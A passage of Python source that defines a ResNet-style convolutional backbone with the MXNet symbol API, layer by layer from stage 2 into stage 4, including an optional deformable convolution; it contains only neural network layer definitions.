res2a_branch1 = mx.symbol.Convolution(name='res2a_branch1', data=pool1, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn2a_branch1 = mx.symbol.BatchNorm(name='bn2a_branch1', data=res2a_branch1, use_global_stats=True, fix_gamma=False, eps=eps)
scale2a_branch1 = bn2a_branch1
res2a_branch2a = mx.symbol.Convolution(name='res2a_branch2a', data=pool1, num_filter=64, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn2a_branch2a = mx.symbol.BatchNorm(name='bn2a_branch2a', data=res2a_branch2a, use_global_stats=True, fix_gamma=False, eps=eps)
scale2a_branch2a = bn2a_branch2a
res2a_branch2a_relu = mx.symbol.Activation(name='res2a_branch2a_relu', data=scale2a_branch2a, act_type='relu')
res2a_branch2b = mx.symbol.Convolution(name='res2a_branch2b', data=res2a_branch2a_relu, num_filter=64, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn2a_branch2b = mx.symbol.BatchNorm(name='bn2a_branch2b', data=res2a_branch2b, use_global_stats=True, fix_gamma=False, eps=eps)
scale2a_branch2b = bn2a_branch2b
res2a_branch2b_relu = mx.symbol.Activation(name='res2a_branch2b_relu', data=scale2a_branch2b, act_type='relu')
res2a_branch2c = mx.symbol.Convolution(name='res2a_branch2c', data=res2a_branch2b_relu, num_filter=256,
pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn2a_branch2c = mx.symbol.BatchNorm(name='bn2a_branch2c', data=res2a_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale2a_branch2c = bn2a_branch2c
res2a = mx.symbol.broadcast_add(name='res2a', *[scale2a_branch1, scale2a_branch2c])
res2a_relu = mx.symbol.Activation(name='res2a_relu', data=res2a, act_type='relu')
res2b_branch2a = mx.symbol.Convolution(name='res2b_branch2a', data=res2a_relu, num_filter=64, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn2b_branch2a = mx.symbol.BatchNorm(name='bn2b_branch2a', data=res2b_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale2b_branch2a = bn2b_branch2a
res2b_branch2a_relu = mx.symbol.Activation(name='res2b_branch2a_relu', data=scale2b_branch2a, act_type='relu')
res2b_branch2b = mx.symbol.Convolution(name='res2b_branch2b', data=res2b_branch2a_relu, num_filter=64,
pad=(1, 1),
kernel=(3, 3), stride=(1, 1), no_bias=True)
bn2b_branch2b = mx.symbol.BatchNorm(name='bn2b_branch2b', data=res2b_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale2b_branch2b = bn2b_branch2b
res2b_branch2b_relu = mx.symbol.Activation(name='res2b_branch2b_relu', data=scale2b_branch2b, act_type='relu')
res2b_branch2c = mx.symbol.Convolution(name='res2b_branch2c', data=res2b_branch2b_relu, num_filter=256,
pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn2b_branch2c = mx.symbol.BatchNorm(name='bn2b_branch2c', data=res2b_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale2b_branch2c = bn2b_branch2c
res2b = mx.symbol.broadcast_add(name='res2b', *[res2a_relu, scale2b_branch2c])
res2b_relu = mx.symbol.Activation(name='res2b_relu', data=res2b, act_type='relu')
res2c_branch2a = mx.symbol.Convolution(name='res2c_branch2a', data=res2b_relu, num_filter=64, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn2c_branch2a = mx.symbol.BatchNorm(name='bn2c_branch2a', data=res2c_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale2c_branch2a = bn2c_branch2a
res2c_branch2a_relu = mx.symbol.Activation(name='res2c_branch2a_relu', data=scale2c_branch2a, act_type='relu')
res2c_branch2b = mx.symbol.Convolution(name='res2c_branch2b', data=res2c_branch2a_relu, num_filter=64,
pad=(1, 1),
kernel=(3, 3), stride=(1, 1), no_bias=True)
bn2c_branch2b = mx.symbol.BatchNorm(name='bn2c_branch2b', data=res2c_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale2c_branch2b = bn2c_branch2b
res2c_branch2b_relu = mx.symbol.Activation(name='res2c_branch2b_relu', data=scale2c_branch2b, act_type='relu')
res2c_branch2c = mx.symbol.Convolution(name='res2c_branch2c', data=res2c_branch2b_relu, num_filter=256,
pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn2c_branch2c = mx.symbol.BatchNorm(name='bn2c_branch2c', data=res2c_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale2c_branch2c = bn2c_branch2c
res2c = mx.symbol.broadcast_add(name='res2c', *[res2b_relu, scale2c_branch2c])
res2c_relu = mx.symbol.Activation(name='res2c_relu', data=res2c, act_type='relu')
res3a_branch1 = mx.symbol.Convolution(name='res3a_branch1', data=res2c_relu, num_filter=512, pad=(0, 0),
kernel=(1, 1), stride=(2, 2), no_bias=True)
bn3a_branch1 = mx.symbol.BatchNorm(name='bn3a_branch1', data=res3a_branch1, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3a_branch1 = bn3a_branch1
res3a_branch2a = mx.symbol.Convolution(name='res3a_branch2a', data=res2c_relu, num_filter=128, pad=(0, 0),
kernel=(1, 1), stride=(2, 2), no_bias=True)
bn3a_branch2a = mx.symbol.BatchNorm(name='bn3a_branch2a', data=res3a_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3a_branch2a = bn3a_branch2a
res3a_branch2a_relu = mx.symbol.Activation(name='res3a_branch2a_relu', data=scale3a_branch2a, act_type='relu')
res3a_branch2b = mx.symbol.Convolution(name='res3a_branch2b', data=res3a_branch2a_relu, num_filter=128,
pad=(1, 1),
kernel=(3, 3), stride=(1, 1), no_bias=True)
bn3a_branch2b = mx.symbol.BatchNorm(name='bn3a_branch2b', data=res3a_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3a_branch2b = bn3a_branch2b
res3a_branch2b_relu = mx.symbol.Activation(name='res3a_branch2b_relu', data=scale3a_branch2b, act_type='relu')
res3a_branch2c = mx.symbol.Convolution(name='res3a_branch2c', data=res3a_branch2b_relu, num_filter=512,
pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn3a_branch2c = mx.symbol.BatchNorm(name='bn3a_branch2c', data=res3a_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3a_branch2c = bn3a_branch2c
res3a = mx.symbol.broadcast_add(name='res3a', *[scale3a_branch1, scale3a_branch2c])
res3a_relu = mx.symbol.Activation(name='res3a_relu', data=res3a, act_type='relu')
res3b1_branch2a = mx.symbol.Convolution(name='res3b1_branch2a', data=res3a_relu, num_filter=128, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn3b1_branch2a = mx.symbol.BatchNorm(name='bn3b1_branch2a', data=res3b1_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b1_branch2a = bn3b1_branch2a
res3b1_branch2a_relu = mx.symbol.Activation(name='res3b1_branch2a_relu', data=scale3b1_branch2a,
act_type='relu')
res3b1_branch2b = mx.symbol.Convolution(name='res3b1_branch2b', data=res3b1_branch2a_relu, num_filter=128,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn3b1_branch2b = mx.symbol.BatchNorm(name='bn3b1_branch2b', data=res3b1_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b1_branch2b = bn3b1_branch2b
res3b1_branch2b_relu = mx.symbol.Activation(name='res3b1_branch2b_relu', data=scale3b1_branch2b,
act_type='relu')
res3b1_branch2c = mx.symbol.Convolution(name='res3b1_branch2c', data=res3b1_branch2b_relu, num_filter=512,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn3b1_branch2c = mx.symbol.BatchNorm(name='bn3b1_branch2c', data=res3b1_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b1_branch2c = bn3b1_branch2c
res3b1 = mx.symbol.broadcast_add(name='res3b1', *[res3a_relu, scale3b1_branch2c])
res3b1_relu = mx.symbol.Activation(name='res3b1_relu', data=res3b1, act_type='relu')
res3b2_branch2a = mx.symbol.Convolution(name='res3b2_branch2a', data=res3b1_relu, num_filter=128, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn3b2_branch2a = mx.symbol.BatchNorm(name='bn3b2_branch2a', data=res3b2_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b2_branch2a = bn3b2_branch2a
res3b2_branch2a_relu = mx.symbol.Activation(name='res3b2_branch2a_relu', data=scale3b2_branch2a,
act_type='relu')
res3b2_branch2b = mx.symbol.Convolution(name='res3b2_branch2b', data=res3b2_branch2a_relu, num_filter=128,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn3b2_branch2b = mx.symbol.BatchNorm(name='bn3b2_branch2b', data=res3b2_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b2_branch2b = bn3b2_branch2b
res3b2_branch2b_relu = mx.symbol.Activation(name='res3b2_branch2b_relu', data=scale3b2_branch2b,
act_type='relu')
res3b2_branch2c = mx.symbol.Convolution(name='res3b2_branch2c', data=res3b2_branch2b_relu, num_filter=512,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn3b2_branch2c = mx.symbol.BatchNorm(name='bn3b2_branch2c', data=res3b2_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b2_branch2c = bn3b2_branch2c
res3b2 = mx.symbol.broadcast_add(name='res3b2', *[res3b1_relu, scale3b2_branch2c])
res3b2_relu = mx.symbol.Activation(name='res3b2_relu', data=res3b2, act_type='relu')
res3b3_branch2a = mx.symbol.Convolution(name='res3b3_branch2a', data=res3b2_relu, num_filter=128, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn3b3_branch2a = mx.symbol.BatchNorm(name='bn3b3_branch2a', data=res3b3_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b3_branch2a = bn3b3_branch2a
res3b3_branch2a_relu = mx.symbol.Activation(name='res3b3_branch2a_relu', data=scale3b3_branch2a,
act_type='relu')
if with_dpyramid:
res3b3_branch2b_offset = mx.symbol.Convolution(name='res3b3_branch2b_offset', data=res3b3_branch2a_relu,
num_filter=72, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
res3b3_branch2b = mx.contrib.symbol.DeformableConvolution(name='res3b3_branch2b', data=res3b3_branch2a_relu,
offset=res3b3_branch2b_offset,
num_filter=128, pad=(1, 1), kernel=(3, 3),
num_deformable_group=4,
stride=(1, 1), no_bias=True)
else:
res3b3_branch2b = mx.symbol.Convolution(name='res3b3_branch2b', data=res3b3_branch2a_relu, num_filter=128,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn3b3_branch2b = mx.symbol.BatchNorm(name='bn3b3_branch2b', data=res3b3_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b3_branch2b = bn3b3_branch2b
res3b3_branch2b_relu = mx.symbol.Activation(name='res3b3_branch2b_relu', data=scale3b3_branch2b,
act_type='relu')
res3b3_branch2c = mx.symbol.Convolution(name='res3b3_branch2c', data=res3b3_branch2b_relu, num_filter=512,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn3b3_branch2c = mx.symbol.BatchNorm(name='bn3b3_branch2c', data=res3b3_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b3_branch2c = bn3b3_branch2c
res3b3 = mx.symbol.broadcast_add(name='res3b3', *[res3b2_relu, scale3b3_branch2c])
res3b3_relu = mx.symbol.Activation(name='res3b3_relu', data=res3b3, act_type='relu')
res4a_branch1 = mx.symbol.Convolution(name='res4a_branch1', data=res3b3_relu, num_filter=1024, pad=(0, 0),
kernel=(1, 1), stride=(2, 2), no_bias=True)
bn4a_branch1 = mx.symbol.BatchNorm(name='bn4a_branch1', data=res4a_branch1, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4a_branch1 = bn4a_branch1
res4a_branch2a = mx.symbol.Convolution(name='res4a_branch2a', data=res3b3_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(2, 2), no_bias=True)
bn4a_branch2a = mx.symbol.BatchNorm(name='bn4a_branch2a', data=res4a_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4a_branch2a = bn4a_branch2a
res4a_branch2a_relu = mx.symbol.Activation(name='res4a_branch2a_relu', data=scale4a_branch2a, act_type='relu')
res4a_branch2b = mx.symbol.Convolution(name='res4a_branch2b', data=res4a_branch2a_relu, num_filter=256,
pad=(1, 1),
kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4a_branch2b = mx.symbol.BatchNorm(name='bn4a_branch2b', data=res4a_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4a_branch2b = bn4a_branch2b
res4a_branch2b_relu = mx.symbol.Activation(name='res4a_branch2b_relu', data=scale4a_branch2b, act_type='relu')
res4a_branch2c = mx.symbol.Convolution(name='res4a_branch2c', data=res4a_branch2b_relu, num_filter=1024,
pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4a_branch2c = mx.symbol.BatchNorm(name='bn4a_branch2c', data=res4a_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4a_branch2c = bn4a_branch2c
res4a = mx.symbol.broadcast_add(name='res4a', *[scale4a_branch1, scale4a_branch2c])
res4a_relu = mx.symbol.Activation(name='res4a_relu', data=res4a, act_type='relu')
res4b1_branch2a = mx.symbol.Convolution(name='res4b1_branch2a', data=res4a_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b1_branch2a = mx.symbol.BatchNorm(name='bn4b1_branch2a', data=res4b1_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b1_branch2a = bn4b1_branch2a
res4b1_branch2a_relu = mx.symbol.Activation(name='res4b1_branch2a_relu', data=scale4b1_branch2a,
act_type='relu')
res4b1_branch2b = mx.symbol.Convolution(name='res4b1_branch2b', data=res4b1_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b1_branch2b = mx.symbol.BatchNorm(name='bn4b1_branch2b', data=res4b1_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b1_branch2b = bn4b1_branch2b
res4b1_branch2b_relu = mx.symbol.Activation(name='res4b1_branch2b_relu', data=scale4b1_branch2b,
act_type='relu')
res4b1_branch2c = mx.symbol.Convolution(name='res4b1_branch2c', data=res4b1_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b1_branch2c = mx.symbol.BatchNorm(name='bn4b1_branch2c', data=res4b1_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b1_branch2c = bn4b1_branch2c
res4b1 = mx.symbol.broadcast_add(name='res4b1', *[res4a_relu, scale4b1_branch2c])
res4b1_relu = mx.symbol.Activation(name='res4b1_relu', data=res4b1, act_type='relu')
res4b2_branch2a = mx.symbol.Convolution(name='res4b2_branch2a', data=res4b1_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b2_branch2a = mx.symbol.BatchNorm(name='bn4b2_branch2a', data=res4b2_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b2_branch2a = bn4b2_branch2a
res4b2_branch2a_relu = mx.symbol.Activation(name='res4b2_branch2a_relu', data=scale4b2_branch2a,
act_type='relu')
res4b2_branch2b = mx.symbol.Convolution(name='res4b2_branch2b', data=res4b2_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b2_branch2b = mx.symbol.BatchNorm(name='bn4b2_branch2b', data=res4b2_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b2_branch2b = bn4b2_branch2b
res4b2_branch2b_relu = mx.symbol.Activation(name='res4b2_branch2b_relu', data=scale4b2_branch2b,
act_type='relu')
res4b2_branch2c = mx.symbol.Convolution(name='res4b2_branch2c', data=res4b2_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b2_branch2c = mx.symbol.BatchNorm(name='bn4b2_branch2c', data=res4b2_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b2_branch2c = bn4b2_branch2c
res4b2 = mx.symbol.broadcast_add(name='res4b2', *[res4b1_relu, scale4b2_branch2c])
res4b2_relu = mx.symbol.Activation(name='res4b2_relu', data=res4b2, act_type='relu')
res4b3_branch2a = mx.symbol.Convolution(name='res4b3_branch2a', data=res4b2_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b3_branch2a = mx.symbol.BatchNorm(name='bn4b3_branch2a', data=res4b3_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b3_branch2a = bn4b3_branch2a
res4b3_branch2a_relu = mx.symbol.Activation(name='res4b3_branch2a_relu', data=scale4b3_branch2a,
act_type='relu')
res4b3_branch2b = mx.symbol.Convolution(name='res4b3_branch2b', data=res4b3_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b3_branch2b = mx.symbol.BatchNorm(name='bn4b3_branch2b', data=res4b3_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b3_branch2b = bn4b3_branch2b
res4b3_branch2b_relu = mx.symbol.Activation(name='res4b3_branch2b_relu', data=scale4b3_branch2b,
act_type='relu')
res4b3_branch2c = mx.symbol.Convolution(name='res4b3_branch2c', data=res4b3_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b3_branch2c = mx.symbol.BatchNorm(name='bn4b3_branch2c', data=res4b3_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b3_branch2c = bn4b3_branch2c
res4b3 = mx.symbol.broadcast_add(name='res4b3', *[res4b2_relu, scale4b3_branch2c])
res4b3_relu = mx.symbol.Activation(name='res4b3_relu', data=res4b3, act_type='relu')
res4b4_branch2a = mx.symbol.Convolution(name='res4b4_branch2a', data=res4b3_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b4_branch2a = mx.symbol.BatchNorm(name='bn4b4_branch2a', data=res4b4_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b4_branch2a = bn4b4_branch2a
res4b4_branch2a_relu = mx.symbol.Activation(name='res4b4_branch2a_relu', data=scale4b4_branch2a,
act_type='relu')
res4b4_branch2b = mx.symbol.Convolution(name='res4b4_branch2b', data=res4b4_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b4_branch2b = mx.symbol.BatchNorm(name='bn4b4_branch2b', data=res4b4_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b4_branch2b = bn4b4_branch2b
res4b4_branch2b_relu = mx.symbol.Activation(name='res4b4_branch2b_relu', data=scale4b4_branch2b,
act_type='relu')
res4b4_branch2c = mx.symbol.Convolution(name='res4b4_branch2c', data=res4b4_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b4_branch2c = mx.symbol.BatchNorm(name='bn4b4_branch2c', data=res4b4_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b4_branch2c = bn4b4_branch2c
res4b4 = mx.symbol.broadcast_add(name='res4b4', *[res4b3_relu, scale4b4_branch2c])
res4b4_relu = mx.symbol.Activation(name='res4b4_relu', data=res4b4, act_type='relu')
res4b5_branch2a = mx.symbol.Convolution(name='res4b5_branch2a', data=res4b4_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b5_branch2a = mx.symbol.BatchNorm(name='bn4b5_branch2a', data=res4b5_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b5_branch2a = bn4b5_branch2a
res4b5_branch2a_relu = mx.symbol.Activation(name='res4b5_branch2a_relu', data=scale4b5_branch2a,
act_type='relu')
res4b5_branch2b = mx.symbol.Convolution(name='res4b5_branch2b', data=res4b5_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b5_branch2b = mx.symbol.BatchNorm(name='bn4b5_branch2b', data=res4b5_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b5_branch2b = bn4b5_branch2b
res4b5_branch2b_relu = mx.symbol.Activation(name='res4b5_branch2b_relu', data=scale4b5_branch2b,
act_type='relu')
res4b5_branch2c = mx.symbol.Convolution(name='res4b5_branch2c', data=res4b5_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b5_branch2c = mx.symbol.BatchNorm(name='bn4b5_branch2c', data=res4b5_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b5_branch2c = bn4b5_branch2c
res4b5 = mx.symbol.broadcast_add(name='res4b5', *[res4b4_relu, scale4b5_branch2c])
res4b5_relu = mx.symbol.Activation(name='res4b5_relu', data=res4b5, act_type='relu')
res4b6_branch2a = mx.symbol.Convolution(name='res4b6_branch2a', data=res4b5_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b6_branch2a = mx.symbol.BatchNorm(name='bn4b6_branch2a', data=res4b6_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b6_branch2a = bn4b6_branch2a
res4b6_branch2a_relu = mx.symbol.Activation(name='res4b6_branch2a_relu', data=scale4b6_branch2a,
act_type='relu')
res4b6_branch2b = mx.symbol.Convolution(name='res4b6_branch2b', data=res4b6_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b6_branch2b = mx.symbol.BatchNorm(name='bn4b6_branch2b', data=res4b6_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b6_branch2b = bn4b6_branch2b
res4b6_branch2b_relu = mx.symbol.Activation(name='res4b6_branch2b_relu', data=scale4b6_branch2b,
act_type='relu')
res4b6_branch2c = mx.symbol.Convolution(name='res4b6_branch2c', data=res4b6_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b6_branch2c = mx.symbol.BatchNorm(name='bn4b6_branch2c', data=res4b6_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b6_branch2c = bn4b6_branch2c
res4b6 = mx.symbol.broadcast_add(name='res4b6', *[res4b5_relu, scale4b6_branch2c])
res4b6_relu = mx.symbol.Activation(name='res4b6_relu', data=res4b6, act_type='relu')
res4b7_branch2a = mx.symbol.Convolution(name='res4b7_branch2a', data=res4b6_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b7_branch2a = mx.symbol.BatchNorm(name='bn4b7_branch2a', data=res4b7_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b7_branch2a = bn4b7_branch2a
res4b7_branch2a_relu = mx.symbol.Activation(name='res4b7_branch2a_relu', data=scale4b7_branch2a,
act_type='relu')
res4b7_branch2b = mx.symbol.Convolution(name='res4b7_branch2b', data=res4b7_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b7_branch2b = mx.symbol.BatchNorm(name='bn4b7_branch2b', data=res4b7_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b7_branch2b = bn4b7_branch2b
res4b7_branch2b_relu = mx.symbol.Activation(name='res4b7_branch2b_relu', data=scale4b7_branch2b,
act_type='relu')
res4b7_branch2c = mx.symbol.Convolution(name='res4b7_branch2c', data=res4b7_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b7_branch2c = mx.symbol.BatchNorm(name='bn4b7_branch2c', data=res4b7_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b7_branch2c = bn4b7_branch2c
res4b7 = mx.symbol.broadcast_add(name='res4b7', *[res4b6_relu, scale4b7_branch2c])
res4b7_relu = mx.symbol.Activation(name='res4b7_relu', data=res4b7, act_type='relu')
res4b8_branch2a = mx.symbol.Convolution(name='res4b8_branch2a', data=res4b7_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b8_branch2a = mx.symbol.BatchNorm(name='bn4b8_branch2a', data=res4b8_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b8_branch2a = bn4b8_branch2a
res4b8_branch2a_relu = mx.symbol.Activation(name='res4b8_branch2a_relu', data=scale4b8_branch2a,
act_type='relu')
res4b8_branch2b = mx.symbol.Convolution(name='res4b8_branch2b', data=res4b8_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b8_branch2b = mx.symbol.BatchNorm(name='bn4b8_branch2b', data=res4b8_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b8_branch2b = bn4b8_branch2b
res4b8_branch2b_relu = mx.symbol.Activation(name='res4b8_branch2b_relu', data=scale4b8_branch2b,
act_type='relu')
res4b8_branch2c = mx.symbol.Convolution(name='res4b8_branch2c', data=res4b8_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b8_branch2c = mx.symbol.BatchNorm(name='bn4b8_branch2c', data=res4b8_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b8_branch2c = bn4b8_branch2c
res4b8 = mx.symbol.broadcast_add(name='res4b8', *[res4b7_relu, scale4b8_branch2c])
res4b8_relu = mx.symbol.Activation(name='res4b8_relu', data=res4b8, act_type='relu')
res4b9_branch2a = mx.symbol.Convolution(name='res4b9_branch2a', data=res4b8_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b9_branch2a = mx.symbol.BatchNorm(name='bn4b9_branch2a', data=res4b9_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b9_branch2a = bn4b9_branch2a
res4b9_branch2a_relu = mx.symbol.Activation(name='res4b9_branch2a_relu', data=scale4b9_branch2a,
act_type='relu')
res4b9_branch2b = mx.symbol.Convolution(name='res4b9_branch2b', data=res4b9_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b9_branch2b = mx.symbol.BatchNorm(name='bn4b9_branch2b', data=res4b9_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b9_branch2b = bn4b9_branch2b
res4b9_branch2b_relu = mx.symbol.Activation(name='res4b9_branch2b_relu', data=scale4b9_branch2b,
act_type='relu')
res4b9_branch2c = mx.symbol.Convolution(name='res4b9_branch2c', data=res4b9_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b9_branch2c = mx.symbol.BatchNorm(name='bn4b9_branch2c', data=res4b9_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b9_branch2c = bn4b9_branch2c
res4b9 = mx.symbol.broadcast_add(name='res4b9', *[res4b8_relu, scale4b9_branch2c])
res4b9_relu = mx.symbol.Activation(name='res4b9_relu', data=res4b9, act_type='relu')
res4b10_branch2a = mx.symbol.Convolution(name='res4b10_branch2a', data=res4b9_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b10_branch2a = mx.symbol.BatchNorm(name='bn4b10_branch2a', data=res4b10_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b10_branch2a = bn4b10_branch2a
res4b10_branch2a_relu = mx.symbol.Activation(name='res4b10_branch2a_relu', data=scale4b10_branch2a,
act_type='relu')
res4b10_branch2b = mx.symbol.Convolution(name='res4b10_branch2b', data=res4b10_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b10_branch2b = mx.symbol.BatchNorm(name='bn4b10_branch2b', data=res4b10_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b10_branch2b = bn4b10_branch2b
res4b10_branch2b_relu = mx.symbol.Activation(name='res4b10_branch2b_relu', data=scale4b10_branch2b,
act_type='relu')
res4b10_branch2c = mx.symbol.Convolution(name='res4b10_branch2c', data=res4b10_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b10_branch2c = mx.symbol.BatchNorm(name='bn4b10_branch2c', data=res4b10_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b10_branch2c = bn4b10_branch2c
res4b10 = mx.symbol.broadcast_add(name='res4b10', *[res4b9_relu, scale4b10_branch2c])
res4b10_relu = mx.symbol.Activation(name='res4b10_relu', data=res4b10, act_type='relu')
res4b11_branch2a = mx.symbol.Convolution(name='res4b11_branch2a', data=res4b10_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b11_branch2a = mx.symbol.BatchNorm(name='bn4b11_branch2a', data=res4b11_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b11_branch2a = bn4b11_branch2a
res4b11_branch2a_relu = mx.symbol.Activation(name='res4b11_branch2a_relu', data=scale4b11_branch2a,
act_type='relu')
res4b11_branch2b = mx.symbol.Convolution(name='res4b11_branch2b', data=res4b11_branch2a_relu, num_filter=256,
